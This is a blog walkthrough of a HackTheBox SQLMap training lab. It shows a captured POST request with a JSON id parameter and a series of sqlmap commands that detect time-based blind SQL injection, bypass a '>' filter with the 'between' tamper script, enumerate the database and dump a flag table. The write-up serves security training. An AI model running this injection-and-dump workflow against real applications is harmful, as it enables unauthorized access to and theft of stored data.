HackTheBox - SQLMap Essentials - Skills Assessment Walkthrough

Ido AbramovIdo Abramov
2 min read

Scenario

You are given access to a web application with basic protection mechanisms. Use the skills learned in this module to find the SQLi vulnerability with SQLMap and exploit it accordingly. To complete this module, find the flag and submit it here.

Walkthrough

Entering the target URL takes us to the next page, which appears to be a shoe shop website:

After some browsing, I found an 'Add to Cart' functionality on the shop.html page, which performs a HTTP POST request to /action.php :

POST /action.php HTTP/1.1
Host: 94.237.57.211:48604
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.57.211:48604/shop.html
Content-Type: application/json
Content-Length: 8
Origin: http://94.237.57.211:48604
DNT: 1
Connection: keep-alive
Sec-GPC: 1
Priority: u=0

{"id":1}

We can see that it contains a JSON body with the parameter id set to the value 1.

Copy the request into a file and named it req.txt.

Now, we will start SQLMap using the request data:

sqlmap -r req.txt

SQLMap will generate a lot of output, we can spot some interesting results:

We can see that the id parameter is vulnerable to SQL injection, specifically to the time-based blind SQL injection technique. Additionally, SQLMap suggests using the between tamper script, as the server is filtering the > character.

With that information, the next step is to enumerate the database.

We will use several flags to find the database banner, the current user executing the queries, the current database in use, and whether the current user has database administrator privileges:

sqlmap -r req.txt --banner --current-user --current-db --is-dba --tamper=between

The output will be:

Using this information, we know the current database is production. Next, let’s enumerate the tables in this database:

sqlmap -r req.txt --tamper=between -D production --tables

Result:

We can see an interesting table called final_flag. Let’s try to retrieve its values and possibly find the flag we’re looking for. We will use the --dump flag to extract all the data from the table:

sqlmap -r req.txt --tamper=between -D production -T final_flag --dump

Since SQLMap is using a blind SQL injection technique, the process will take time and output one character at a time until it completes and retrieves the full value:

And finally, we found the flag !

0
Subscribe to my newsletter

Read articles from Ido Abramov directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#HackTheBoxhackingsqlmap#sqlinjectionSQL InjectionCBBHWeb App Security#WebAppSecurity

Written by

Ido Abramov
Ido Abramov